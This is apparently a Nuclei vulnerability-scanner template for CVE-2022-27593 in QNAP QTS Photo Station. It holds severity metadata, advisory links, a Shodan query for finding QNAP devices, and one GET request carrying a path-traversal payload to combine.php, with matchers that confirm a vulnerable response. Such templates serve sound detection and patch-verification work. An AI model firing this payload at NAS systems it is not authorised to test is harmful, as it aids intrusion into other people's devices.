id: CVE-2022-27593

info:
  name: QNAP QTS Photo Station External Reference
  author: allenwest24
  severity: critical
  description: |
    An externally controlled reference to a resource vulnerability has been reported to affect QNAP NAS running Photo Station. If exploited, this could allow an attacker to modify system files. We have already fixed the vulnerability in the following versions:
    QTS 5.0.1: Photo Station 6.1.2 and later
    QTS 5.0.0/4.5.x: Photo Station 6.0.22 and later
    QTS 4.3.6: Photo Station 5.7.18 and later
    QTS 4.3.3: Photo Station 5.4.15 and later
    QTS 4.2.6: Photo Station 5.2.14 and later
  reference:
    - https://attackerkb.com/topics/7We3SjEYVo/cve-2022-27593
    - https://www.qnap.com/en/security-advisory/qsa-22-24
    - https://nvd.nist.gov/vuln/detail/CVE-2022-27593
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27593
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2022-27593
    cwe-id: CWE-610
  metadata:
    verified: true
    shodan-query: title:"QNAP"
  tags: cve,cve2022,qnap,lfi,kev

requests:
  - method: GET
    path:
      - "{{BaseURL}}/photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php."

    matchers-condition: and
    matchers:
      - type: word
        part: response
        words:
          - "!function(p,qa){"
          - "module.exports"
          - "application/javascript"
        condition: and

      - type: status
        status:
          - 200